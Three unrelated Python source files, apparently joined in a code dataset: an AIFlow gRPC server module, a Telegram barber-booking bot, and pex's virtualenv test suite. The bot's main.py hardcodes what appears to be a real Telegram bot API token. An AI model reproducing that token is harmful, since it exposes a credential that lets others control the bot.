# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import asyncio
import functools
import inspect
import os
import sys
import tempfile
import threading
import time
from concurrent import futures
import logging
import grpc
from grpc import _common, _server
from grpc._cython.cygrpc import StatusCode
from grpc._server import _serialize_response, _status, _abort, _Context, _unary_request, \
_select_thread_pool_for_behavior, _unary_response_in_pool
from typing import Dict
from notification_service.service import NotificationService
from ai_flow.protobuf.high_availability_pb2_grpc import add_HighAvailabilityManagerServicer_to_server
from ai_flow.endpoint.server.high_availability import SimpleAIFlowServerHaManager, HighAvailableService
from ai_flow.store.db.base_model import base
from ai_flow.store.sqlalchemy_store import SqlAlchemyStore
from ai_flow.store.mongo_store import MongoStore, MongoStoreConnManager
from ai_flow.store.db.db_util import extract_db_engine_from_uri, parse_mongo_uri
from ai_flow.endpoint.server.server_config import DBType
from notification_service.proto import notification_service_pb2_grpc
from ai_flow.metadata_store.service.service import MetadataService
from ai_flow.model_center.service.service import ModelCenterService
from ai_flow.metric.service.metric_service import MetricService
from ai_flow.scheduler.scheduler_service import SchedulerService, SchedulerServiceConfig
sys.path.append(os.path.abspath(os.path.join(os.getcwd(), "../../..")))
from ai_flow.protobuf import model_center_service_pb2_grpc, \
metadata_service_pb2_grpc, metric_service_pb2_grpc, scheduling_service_pb2_grpc
_PORT = '50051'
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
class AIFlowServer(object):
"""
    Blocking/async server of an AIFlow REST endpoint that provides the metadata, model-center and notification services.
"""
def __init__(self, store_uri=None, port=_PORT,
start_default_notification: bool = True,
notification_uri=None,
start_meta_service: bool = True,
start_model_center_service: bool = True,
start_metric_service: bool = True,
start_scheduler_service: bool = True,
scheduler_service_config: Dict = None,
enabled_ha: bool = False,
ha_manager=None,
ha_server_uri=None,
ha_storage=None,
ttl_ms: int = 10000):
self.store_uri = store_uri
self.db_type = DBType.value_of(extract_db_engine_from_uri(store_uri))
self.executor = Executor(futures.ThreadPoolExecutor(max_workers=10))
self.server = grpc.server(self.executor)
self.start_default_notification = start_default_notification
self.enabled_ha = enabled_ha
server_uri = 'localhost:{}'.format(port)
if start_default_notification:
logging.info("start default notification service.")
notification_service_pb2_grpc.add_NotificationServiceServicer_to_server(
NotificationService.from_storage_uri(store_uri),
self.server)
if start_model_center_service:
logging.info("start model center service.")
model_center_service_pb2_grpc.add_ModelCenterServiceServicer_to_server(
ModelCenterService(store_uri=store_uri,
notification_uri=server_uri if start_default_notification
and notification_uri is None else notification_uri),
self.server)
if start_meta_service:
logging.info("start meta service.")
metadata_service_pb2_grpc.add_MetadataServiceServicer_to_server(
MetadataService(db_uri=store_uri, server_uri=server_uri), self.server)
if start_metric_service:
logging.info("start metric service.")
metric_service_pb2_grpc.add_MetricServiceServicer_to_server(MetricService(db_uri=store_uri), self.server)
if start_scheduler_service:
self._add_scheduler_service(scheduler_service_config)
if enabled_ha:
self._add_ha_service(ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms)
self.server.add_insecure_port('[::]:' + str(port))
def _add_scheduler_service(self, scheduler_service_config):
logging.info("start scheduler service.")
# check the `scheduler` option of scheduler service config
if scheduler_service_config is None:
raise Exception(
'The `scheduler` option of scheduler service config is not configured. '
'Please add the `scheduler` option!')
if 'scheduler_class_name' not in scheduler_service_config:
raise Exception(
'The `scheduler_class_name` option of scheduler service config is not configured. '
'Please add the `scheduler_class_name` option under the `scheduler` option!')
if 'scheduler_config' not in scheduler_service_config:
scheduler_service_config['scheduler_config'] = {}
real_config = SchedulerServiceConfig()
real_config.set_scheduler_config(scheduler_service_config.get('scheduler_config'))
real_config.set_repository(scheduler_service_config.get('repository'))
real_config.set_scheduler_class_name(scheduler_service_config.get('scheduler_class_name'))
self.scheduler_service = SchedulerService(real_config)
scheduling_service_pb2_grpc.add_SchedulingServiceServicer_to_server(self.scheduler_service,
self.server)
def _add_ha_service(self, ha_manager, ha_server_uri, ha_storage, store_uri, ttl_ms):
if ha_manager is None:
ha_manager = SimpleAIFlowServerHaManager()
if ha_server_uri is None:
raise ValueError("ha_server_uri is required with ha enabled!")
if ha_storage is None:
db_engine = extract_db_engine_from_uri(store_uri)
if DBType.value_of(db_engine) == DBType.MONGODB:
username, password, host, port, db = parse_mongo_uri(store_uri)
ha_storage = MongoStore(host=host,
port=int(port),
username=username,
password=password,
db=db)
else:
ha_storage = SqlAlchemyStore(store_uri)
self.ha_service = HighAvailableService(ha_manager, ha_server_uri, ha_storage, ttl_ms)
add_HighAvailabilityManagerServicer_to_server(self.ha_service, self.server)
def run(self, is_block=False):
if self.enabled_ha:
self.ha_service.start()
self.server.start()
logging.info('AIFlow server started.')
if is_block:
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
self.stop()
else:
pass
def stop(self, clear_sql_lite_db_file=False):
self.executor.shutdown()
self.server.stop(0)
if self.enabled_ha:
self.ha_service.stop()
if self.db_type == DBType.SQLITE and clear_sql_lite_db_file:
store = SqlAlchemyStore(self.store_uri)
base.metadata.drop_all(store.db_engine)
os.remove(self.store_uri[10:])
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().disconnect_all()
logging.info('AIFlow server stopped.')
def _clear_db(self):
if self.db_type == DBType.SQLITE:
store = SqlAlchemyStore(self.store_uri)
base.metadata.drop_all(store.db_engine)
base.metadata.create_all(store.db_engine)
elif self.db_type == DBType.MONGODB:
MongoStoreConnManager().drop_all()
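# Runs the given asyncio loop on the current thread until it is stopped, then drains any
# tasks that are still pending.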
def _loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
if not loop.is_running() or loop.is_closed():
loop.run_forever()
pending = asyncio.all_tasks(loop=loop)
if pending:
loop.run_until_complete(asyncio.gather(*pending))
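# Executor adapter handed to grpc.server(): coroutine functions are scheduled onto the
# asyncio loop, while plain callables are delegated to the wrapped thread pool.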
class Executor(futures.Executor):
def __init__(self, thread_pool, loop=None):
super().__init__()
self._shutdown = False
self._thread_pool = thread_pool
self._loop = loop or asyncio.get_event_loop()
if not self._loop.is_running() or self._loop.is_closed():
self._thread = threading.Thread(target=_loop, args=(self._loop,), daemon=True)
self._thread.start()
def submit(self, fn, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new futures after shutdown.')
if not self._loop.is_running():
raise RuntimeError('Loop must be started before any function could be submitted.')
if inspect.iscoroutinefunction(fn):
coroutine = fn(*args, **kwargs)
return asyncio.run_coroutine_threadsafe(coroutine, self._loop)
else:
func = functools.partial(fn, *args, **kwargs)
return self._loop.run_in_executor(self._thread_pool, func)
def shutdown(self, wait=True):
self._shutdown = True
if wait:
self._thread_pool.shutdown()
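# Async variants of grpc._server's behavior helpers: the servicer behavior is awaited and
# any exception aborts the RPC with StatusCode.unknown.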
async def _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer):
context = _Context(rpc_event, state, request_deserializer)
try:
return await behavior(argument, context), True
except Exception as e:
        with state.condition:
            if e not in state.rpc_errors:
                logging.exception(e)
                _abort(state, rpc_event.call, StatusCode.unknown, _common.encode(e))
return None, False
async def _unary_response_in_pool_async(rpc_event, state, behavior, argument_thunk, request_deserializer,
response_serializer):
argument = argument_thunk()
if argument is not None:
response, proceed = await _call_behavior_async(rpc_event, state, behavior, argument, request_deserializer)
if proceed:
serialized_response = _serialize_response(rpc_event, state, response, response_serializer)
if serialized_response is not None:
_status(rpc_event, state, serialized_response)
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
unary_request = _unary_request(rpc_event, state, method_handler.request_deserializer)
thread_pool = _select_thread_pool_for_behavior(method_handler.unary_unary, default_thread_pool)
if asyncio.iscoroutinefunction(method_handler.unary_unary):
return thread_pool.submit(_unary_response_in_pool_async, rpc_event, state, method_handler.unary_unary,
unary_request, method_handler.request_deserializer,
method_handler.response_serializer)
else:
return thread_pool.submit(_unary_response_in_pool, rpc_event, state, method_handler.unary_unary, unary_request,
method_handler.request_deserializer, method_handler.response_serializer)
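# Monkey-patch grpc's internal unary-unary handler so that coroutine servicer methods are
# scheduled on the asyncio loop via the Executor above, while regular callables keep the
# stock thread-pool path.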
_server._handle_unary_unary = _handle_unary_unary
if __name__ == '__main__':
fd, temp_db_file = tempfile.mkstemp()
os.close(fd)
store_uri = '%s%s' % ('sqlite:///', temp_db_file)
server = AIFlowServer(store_uri=store_uri)
server.run(is_block=True)
|
main.py
|
from multiprocessing.context import Process
from threading import Thread
import schedule
import telebot
import time
from db import dbstart, db_update, isNewClient, columnLists
from manageControl import new_user, mainmenu, barber_list, select_barber, select_day, select_time, new_order, waiting, \
set_mark, add_mark_to_db, history_menu, instructions
bot = telebot.TeleBot('2120063146:AAGFdvPdx22l_DvrW4xejLaM7YUNvQwbyAc')
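# Background helper: refreshes the database every day at 07:00 on a separate thread
# (started from __main__ via start_process()).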
class ScheduleUpdate():
def try_update_db(self):
        schedule.every().day.at("07:00").do(self.schedule_update)
while True:
schedule.run_pending()
time.sleep(1)
def schedule_update(self):
db_update()
    def start_process(self):  # Start the background update thread
Thread(target=self.try_update_db, args=()).start()
@bot.message_handler(commands=['start'])
def start_messages(message):
chatid = message.chat.id
if isNewClient(chatid):
new_user(chatid)
else:
mainmenu(chatid)
@bot.message_handler(content_types=['text'])
def get_text_messages(message):
    bot.send_message(message.from_user.id, "Hello, " + message.text)
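# Inline-keyboard callback router: each branch below matches the callback_data payload
# set on a menu button and opens the corresponding screen.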
@bot.callback_query_handler(func=lambda message: True)
def answer(message):
chatid = message.message.chat.id
barber_id = None
time = None
if message.data == 'price_list':
try:
barber_list(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'to_main_menu':
try:
mainmenu(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'back_to_welcome':
try:
new_user(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif message.data == 'new_haircut':
try:
select_barber(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'barber_' in message.data:
try:
barber_id = message.data[-1]
select_day(chatid, message.message.message_id, barber_id)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'date_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_date_", "_")
select_time(chatid, message.message.message_id, info_str)
print(info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'time_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_time_", " ")
print(info_str)
new_order(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'to_waiting' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("to_waiting_", "")
waiting(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'to_mark' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("to_mark_", "")
set_mark(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif '_marked_' in message.data:
try:
message_copy = message.data
info_str = message_copy.replace("_marked_", "_")
add_mark_to_db(chatid, message.message.message_id, info_str)
except Exception as e:
print(message.data + ' Error: ', e)
elif 'history' in message.data:
try:
history_menu(chatid, message.message.message_id)
columnLists("Orders")
except Exception as e:
print(message.data + ' Error: ', e)
elif 'instructions' in message.data:
try:
instructions(chatid, message.message.message_id)
except Exception as e:
print(message.data + ' Error: ', e)
if __name__ == '__main__':
dbstart()
p = ScheduleUpdate()
p.start_process()
#columnLists("Orders")
try:
bot.polling(none_stop=True, interval=0)
except Exception as e:
print(' Error: ', e)
|
test_venv.py
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import tempfile
from subprocess import CalledProcessError
from textwrap import dedent
import pytest
from pex.common import safe_mkdtemp, safe_open, temporary_dir, touch
from pex.compatibility import PY2
from pex.executor import Executor
from pex.interpreter import PythonInterpreter
from pex.pex_builder import CopyMode, PEXBuilder
from pex.testing import IS_PYPY, PY38, PY_VER, ensure_python_interpreter, run_pex_command
from pex.tools.commands.virtualenv import Virtualenv
from pex.typing import TYPE_CHECKING, cast
from pex.util import named_temporary_file
if TYPE_CHECKING:
from typing import Any, Dict, Iterable, Iterator, List, Optional, Protocol, Set, Text, Tuple
class CreatePexVenv(Protocol):
def __call__(self, *options):
# type: (*str) -> Virtualenv
pass
FABRIC_VERSION = "2.5.0"
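# Module-scoped fixture: builds a fabric PEX with --include-tools once and shares the
# resulting file path across all tests in this module.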
@pytest.fixture(scope="module")
def pex():
# type: () -> Iterator[str]
with temporary_dir() as tmpdir:
pex_path = os.path.join(tmpdir, "fabric.pex")
src_dir = os.path.join(tmpdir, "src")
touch(os.path.join(src_dir, "user/__init__.py"))
touch(os.path.join(src_dir, "user/package/__init__.py"))
# N.B.: --unzip just speeds up runs 2+ of the pex file and is otherwise not relevant to
# these tests.
run_pex_command(
args=[
"fabric=={}".format(FABRIC_VERSION),
"-c",
"fab",
"--sources-directory",
src_dir,
"-o",
pex_path,
"--include-tools",
]
)
yield os.path.realpath(pex_path)
def make_env(**kwargs):
# type: (**Any) -> Dict[str, str]
env = os.environ.copy()
env.update((k, str(v)) for k, v in kwargs.items())
return env
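# Per-test fixture: yields a helper that runs `PEX_TOOLS=1 <pex> venv <dir> [options]`
# and returns the resulting Virtualenv.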
@pytest.fixture
def create_pex_venv(pex):
# type: (str) -> Iterator[CreatePexVenv]
with temporary_dir() as tmpdir:
venv_dir = os.path.join(tmpdir, "venv")
def _create_pex_venv(*options):
# type: (*str) -> Virtualenv
subprocess.check_call(
args=[pex, "venv", venv_dir] + list(options or ()), env=make_env(PEX_TOOLS="1")
)
return Virtualenv(venv_dir)
yield _create_pex_venv
def test_force(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv("--pip")
venv.interpreter.execute(args=["-m", "pip", "install", "ansicolors==1.1.8"])
venv.interpreter.execute(args=["-c", "import colors"])
with pytest.raises(CalledProcessError):
create_pex_venv()
venv_force = create_pex_venv("--force")
# The re-created venv should have no ansicolors installed like the prior venv.
with pytest.raises(Executor.NonZeroExit):
venv_force.interpreter.execute(args=["-c", "import colors"])
# The re-created venv should have no pip installed either.
with pytest.raises(Executor.NonZeroExit):
        venv_force.interpreter.execute(args=["-m", "pip", "install", "ansicolors==1.1.8"])
def execute_venv_pex_interpreter(
venv, # type: Virtualenv
code=None, # type: Optional[str]
extra_args=(), # type: Iterable[str]
**extra_env # type: Any
):
# type: (...) -> Tuple[int, Text, Text]
process = subprocess.Popen(
args=[venv.join_path("pex")] + list(extra_args),
env=make_env(PEX_INTERPRETER=True, **extra_env),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
)
stdout, stderr = process.communicate(input=None if code is None else code.encode())
return process.returncode, stdout.decode("utf-8"), stderr.decode("utf-8")
def expected_file_path(
venv, # type: Virtualenv
package, # type: str
):
# type: (...) -> str
return os.path.realpath(
os.path.join(
venv.site_packages_dir,
os.path.sep.join(package.split(".")),
"__init__.{ext}".format(ext="pyc" if venv.interpreter.version[0] == 2 else "py"),
)
)
def parse_fabric_version_output(output):
# type: (Text) -> Dict[Text, Text]
return dict(cast("Tuple[Text, Text]", line.split(" ", 1)) for line in output.splitlines())
def test_venv_pex(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv()
venv_pex = venv.join_path("pex")
fabric_output = subprocess.check_output(args=[venv_pex, "-V"])
# N.B.: `fab -V` output looks like so:
# $ fab -V
# Fabric 2.5.0
# Paramiko 2.7.2
# Invoke 1.4.1
versions = parse_fabric_version_output(fabric_output.decode("utf-8"))
assert FABRIC_VERSION == versions["Fabric"]
invoke_version = "Invoke {}".format(versions["Invoke"])
invoke_script_output = subprocess.check_output(
args=[venv_pex, "-V"], env=make_env(PEX_SCRIPT="invoke")
)
assert invoke_version == invoke_script_output.decode("utf-8").strip()
invoke_entry_point_output = subprocess.check_output(
args=[venv_pex, "-V"],
env=make_env(PEX_MODULE="invoke.main:program.run"),
)
assert invoke_version == invoke_entry_point_output.decode("utf-8").strip()
pex_extra_sys_path = ["/dev/null", "Bob"]
returncode, _, stderr = execute_venv_pex_interpreter(
venv,
code=dedent(
"""\
from __future__ import print_function
import os
import sys
def assert_equal(test_num, expected, actual):
if expected == actual:
return
print(
"[{{}}] Expected {{}} but got {{}}".format(test_num, expected, actual),
file=sys.stderr,
)
sys.exit(test_num)
assert_equal(1, {pex_extra_sys_path!r}, sys.path[-2:])
import fabric
assert_equal(2, {fabric!r}, os.path.realpath(fabric.__file__))
import user.package
assert_equal(3, {user_package!r}, os.path.realpath(user.package.__file__))
""".format(
pex_extra_sys_path=pex_extra_sys_path,
fabric=expected_file_path(venv, "fabric"),
user_package=expected_file_path(venv, "user.package"),
)
),
PEX_EXTRA_SYS_PATH=os.pathsep.join(pex_extra_sys_path),
)
assert 0 == returncode, stderr
def test_binary_path(create_pex_venv):
# type: (CreatePexVenv) -> None
code = dedent(
"""\
import errno
import subprocess
import sys
# PEXed code should be able to find all (console) scripts on the $PATH when the venv is
# created with --bin-path set, and the scripts should all run with the venv interpreter in
# order to find their code.
def try_invoke(*args):
try:
subprocess.check_call(list(args))
return 0
except OSError as e:
if e.errno == errno.ENOENT:
# This is what we expect when scripts are not set up on PATH via --bin-path.
return 1
return 2
exit_code = try_invoke("fab", "-V")
exit_code += 10 * try_invoke("inv", "-V")
exit_code += 100 * try_invoke("invoke", "-V")
sys.exit(exit_code)
"""
)
venv = create_pex_venv()
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=code, PATH=tempfile.gettempdir()
)
assert 111 == returncode, stdout + stderr
venv_bin_path = create_pex_venv("-f", "--bin-path", "prepend")
returncode, _, _ = execute_venv_pex_interpreter(
venv_bin_path, code=code, PATH=tempfile.gettempdir()
)
assert 0 == returncode
def test_venv_pex_interpreter_special_modes(create_pex_venv):
# type: (CreatePexVenv) -> None
venv = create_pex_venv()
# special mode execute module: -m module
returncode, stdout, stderr = execute_venv_pex_interpreter(venv, extra_args=["-m"])
assert 2 == returncode, stderr
assert "" == stdout
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, extra_args=["-m", "fabric", "--version"]
)
assert 0 == returncode, stderr
versions = parse_fabric_version_output(stdout)
assert FABRIC_VERSION == versions["Fabric"]
# special mode execute code string: -c <str>
returncode, stdout, stderr = execute_venv_pex_interpreter(venv, extra_args=["-c"])
assert 2 == returncode, stderr
assert "" == stdout
fabric_file_code = "import fabric, os; print(os.path.realpath(fabric.__file__))"
expected_fabric_file_path = expected_file_path(venv, "fabric")
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, extra_args=["-c", fabric_file_code]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
# special mode execute stdin: -
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=fabric_file_code, extra_args=["-"]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
# special mode execute python file: <py file name>
with named_temporary_file(prefix="code", suffix=".py", mode="w") as fp:
fp.write(fabric_file_code)
fp.close()
returncode, stdout, stderr = execute_venv_pex_interpreter(
venv, code=fabric_file_code, extra_args=[fp.name]
)
assert 0 == returncode, stderr
assert expected_fabric_file_path == stdout.strip()
@pytest.mark.parametrize(
"start_method", getattr(multiprocessing, "get_all_start_methods", lambda: [None])()
)
def test_venv_multiprocessing_issues_1236(
tmpdir, # type: Any
start_method, # type: Optional[str]
):
# type: (...) -> None
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "foo.py"), "w") as fp:
fp.write(
dedent(
"""\
def bar():
print('hello')
"""
)
)
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
import multiprocessing
from foo import bar
if __name__ == '__main__':
if {start_method!r}:
multiprocessing.set_start_method({start_method!r})
p = multiprocessing.Process(target=bar)
p.start()
""".format(
start_method=start_method
)
)
)
pex_file = os.path.join(str(tmpdir), "mp.pex")
result = run_pex_command(args=["-D", src, "-m", "main", "-o", pex_file, "--include-tools"])
result.assert_success()
# Confirm multiprocessing works via normal PEX file execution.
output = subprocess.check_output(args=[pex_file])
assert "hello" == output.decode("utf-8").strip()
# Confirm multiprocessing works via the `pex` venv script.
venv = os.path.join(str(tmpdir), "venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=True))
output = subprocess.check_output(args=[os.path.join(venv, "pex")])
assert "hello" == output.decode("utf-8").strip()
def test_venv_symlinked_source_issues_1239(tmpdir):
# type: (Any) -> None
src = os.path.join(str(tmpdir), "src")
main = os.path.join(src, "main.py")
with safe_open(main, "w") as fp:
fp.write("import sys; sys.exit(42)")
pex_builder = PEXBuilder(copy_mode=CopyMode.SYMLINK)
pex_builder.set_executable(main)
pex_file = os.path.join(str(tmpdir), "a.pex")
pex_builder.build(pex_file, bytecode_compile=False)
assert 42 == subprocess.Popen(args=[pex_file]).wait()
venv = os.path.join(str(tmpdir), "a.venv")
subprocess.check_call(
args=[sys.executable, "-m", "pex.tools", pex_builder.path(), "venv", venv]
)
venv_pex = os.path.join(venv, "pex")
shutil.rmtree(src)
assert 42 == subprocess.Popen(args=[venv_pex]).wait()
def test_venv_entrypoint_function_exit_code_issue_1241(tmpdir):
# type: (Any) -> None
pex_file = os.path.join(str(tmpdir), "ep-function.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "module.py"), "w") as fp:
fp.write(
dedent(
"""\
import sys
def target():
args = sys.argv[1:]
if args:
exit = args[0]
try:
return int(exit)
except ValueError:
return exit
"""
)
)
result = run_pex_command(
args=["-D", src, "-e", "module:target", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "ep-function.venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
venv_pex = os.path.join(venv, "pex")
assert 0 == subprocess.Popen(args=[venv_pex]).wait()
def assert_venv_process(
args, # type: List[str]
expected_returncode, # type: int
expected_stdout="", # type: str
expected_stderr="", # type: str
):
# type: (...) -> None
process = subprocess.Popen(
args=[venv_pex] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
stdout, stderr = process.communicate()
assert expected_returncode == process.returncode
assert expected_stdout == stdout.decode("utf-8")
assert expected_stderr == stderr.decode("utf-8")
assert_venv_process(args=["bob"], expected_returncode=1, expected_stderr="bob\n")
assert_venv_process(args=["42"], expected_returncode=42)
def test_venv_copies(tmpdir):
# type: (Any) -> None
python38 = ensure_python_interpreter(PY38)
pex_file = os.path.join(str(tmpdir), "venv.pex")
result = run_pex_command(args=["-o", pex_file, "--include-tools"], python=python38)
result.assert_success()
PEX_TOOLS = make_env(PEX_TOOLS=1)
venv_symlinks = os.path.join(str(tmpdir), "venv.symlinks")
subprocess.check_call(args=[python38, pex_file, "venv", venv_symlinks], env=PEX_TOOLS)
venv_symlinks_interpreter = PythonInterpreter.from_binary(
os.path.join(venv_symlinks, "bin", "python")
)
assert os.path.islink(venv_symlinks_interpreter.binary)
venv_copies = os.path.join(str(tmpdir), "venv.copies")
subprocess.check_call(args=[python38, pex_file, "venv", "--copies", venv_copies], env=PEX_TOOLS)
venv_copies_interpreter = PythonInterpreter.from_binary(
os.path.join(venv_copies, "bin", "python")
)
assert not os.path.islink(venv_copies_interpreter.binary)
def test_relocatable_venv(tmpdir):
# type: (Any) -> None
pex_file = os.path.join(str(tmpdir), "relocatable.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
import sys
from colors import blue
print(blue(sys.executable))
"""
)
)
result = run_pex_command(
args=["-D", src, "ansicolors==1.1.8", "-m", "main", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "relocatable.venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
subprocess.check_call(args=[os.path.join(venv, "pex")])
relocated_relpath = "relocated.venv"
relocated_venv = os.path.join(str(tmpdir), relocated_relpath)
# Since the venv pex script contains a shebang with an absolute path to the venv python
# interpreter, a move of the venv makes the script un-runnable directly.
shutil.move(venv, relocated_venv)
with pytest.raises(OSError) as exec_info:
subprocess.check_call(args=[os.path.join(relocated_venv, "pex")])
assert errno.ENOENT == exec_info.value.errno
# But we should be able to run the script using the moved venv's interpreter.
subprocess.check_call(
args=[
os.path.join(relocated_relpath, "bin", "python"),
os.path.join(relocated_relpath, "pex"),
],
cwd=str(tmpdir),
)
def test_compile(tmpdir):
# type: (Any) -> None
def collect_files(
root_dir, # type: str
extension, # type: str
):
# type: (...) -> Set[str]
return {
os.path.relpath(os.path.join(root, f), root_dir)
for root, _, files in os.walk(root_dir, followlinks=False)
for f in files
if f.endswith(extension)
}
pex_file = os.path.join(str(tmpdir), "compile.pex")
src = os.path.join(str(tmpdir), "src")
with safe_open(os.path.join(src, "main.py"), "w") as fp:
fp.write(
dedent(
"""\
from colors import yellow
print(yellow("Slartibartfast"))
"""
)
)
result = run_pex_command(
args=["-D", src, "ansicolors==1.0.2", "-m", "main", "--include-tools", "-o", pex_file]
)
result.assert_success()
venv = os.path.join(str(tmpdir), "venv")
subprocess.check_call(args=[pex_file, "venv", venv], env=make_env(PEX_TOOLS=1))
# N.B.: The right way to discover the site-packages dir is via site.getsitepackages().
# Unfortunately we use an old version of virtualenv to create PyPy and CPython 2.7 venvs and it
# does not add a getsitepackages function to site.py; so we cheat.
if IS_PYPY:
site_packages = "site-packages"
else:
site_packages = os.path.join(
"lib", "python{}.{}".format(sys.version_info[0], sys.version_info[1]), "site-packages"
)
# Ensure we have at least the basic direct dependency python files we expect.
venv_py_files = collect_files(venv, ".py")
assert os.path.join(site_packages, "main.py") in venv_py_files
assert os.path.join(site_packages, "colors.py") in venv_py_files
assert "__main__.py" in venv_py_files
compile_venv = os.path.join(str(tmpdir), "compile.venv")
subprocess.check_call(
args=[pex_file, "venv", "--compile", compile_venv], env=make_env(PEX_TOOLS=1)
)
# Ensure all original py files have a compiled counterpart.
for py_file in venv_py_files:
if PY2:
assert os.path.exists(os.path.join(compile_venv, py_file + "c"))
else:
name, _ = os.path.splitext(os.path.basename(py_file))
assert os.path.exists(
os.path.join(
compile_venv,
os.path.dirname(py_file),
"__pycache__",
"{name}.{cache_tag}.pyc".format(
name=name, cache_tag=sys.implementation.cache_tag
),
)
)
compile_venv_pyc_files = collect_files(compile_venv, ".pyc")
subprocess.check_call(args=[os.path.join(compile_venv, "pex")])
assert compile_venv_pyc_files == collect_files(
compile_venv, ".pyc"
), "Expected no new compiled python files."
def test_strip_pex_env(tmpdir):
# type: (Any) -> None
def create_pex_venv(strip_pex_env):
# type: (bool) -> str
pex = os.path.join(str(tmpdir), "strip_{}.pex".format(strip_pex_env))
run_pex_command(
args=[
"--strip-pex-env" if strip_pex_env else "--no-strip-pex-env",
"--include-tools",
"-o",
pex,
]
).assert_success()
venv = os.path.join(str(tmpdir), "strip_{}.venv".format(strip_pex_env))
subprocess.check_call(args=[pex, "venv", venv], env=make_env(PEX_TOOLS=1))
return venv
check_pex_env_vars_code = dedent(
"""\
from __future__ import print_function
import os
import sys
pex_env_vars = 0
for name, value in os.environ.items():
if name.startswith("PEX_"):
pex_env_vars += 1
print(
"Un-stripped: {name}={value}".format(name=name, value=value), file=sys.stderr
)
sys.exit(pex_env_vars)
"""
)
two_pex_env_vars = {
name: value
for name, value in make_env(PEX_ROOT="42", PEX_TOOLS=1).items()
if name in ("PEX_ROOT", "PEX_TOOLS") or not name.startswith("PEX_")
}
assert 2 == len([name for name in two_pex_env_vars if name.startswith("PEX_")])
strip_venv = create_pex_venv(strip_pex_env=True)
subprocess.check_call(
args=[os.path.join(strip_venv, "pex"), "-c", check_pex_env_vars_code], env=two_pex_env_vars
)
no_strip_venv = create_pex_venv(strip_pex_env=False)
process = subprocess.Popen(
args=[os.path.join(no_strip_venv, "pex"), "-c", check_pex_env_vars_code],
env=two_pex_env_vars,
)
assert 2 == process.wait()
def test_warn_unused_pex_env_vars():
# type: () -> None
    # N.B.: We don't use the pytest tmpdir fixture here since it creates fairly lengthy paths under
    # /tmp and, under macOS where TMPDIR is already fairly deeply nested, we trigger Pex warnings
    # about script shebang length. Those warnings pollute stderr.
tmpdir = safe_mkdtemp()
venv_pex = os.path.join(tmpdir, "venv.pex")
run_pex_command(["--venv", "-o", venv_pex]).assert_success()
def assert_execute_venv_pex(expected_stderr, **env_vars):
env = os.environ.copy()
env.update(env_vars)
process = subprocess.Popen(
[venv_pex, "-c", ""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
stdout, stderr = process.communicate()
assert 0 == process.returncode
assert not stdout
assert expected_stderr.strip() == stderr.decode("utf-8").strip()
assert_execute_venv_pex(expected_stderr="")
assert_execute_venv_pex(expected_stderr="", PEX_ROOT=os.path.join(tmpdir, "pex_root"))
assert_execute_venv_pex(expected_stderr="", PEX_VENV="1")
assert_execute_venv_pex(expected_stderr="", PEX_EXTRA_SYS_PATH="more")
assert_execute_venv_pex(expected_stderr="", PEX_VERBOSE="0")
assert_execute_venv_pex(
expected_stderr=dedent(
"""\
Ignoring the following environment variables in Pex venv mode:
PEX_INHERIT_PATH=fallback
"""
),
PEX_INHERIT_PATH="fallback",
)
assert_execute_venv_pex(
expected_stderr=dedent(
"""\
Ignoring the following environment variables in Pex venv mode:
PEX_COVERAGE=1
PEX_INHERIT_PATH=fallback
"""
),
PEX_COVERAGE="1",
PEX_INHERIT_PATH="fallback",
PEX_VERBOSE="0",
)
def test_custom_prompt(tmpdir):
# type: (Any) -> None
pex_root = os.path.join(str(tmpdir), "pex_root")
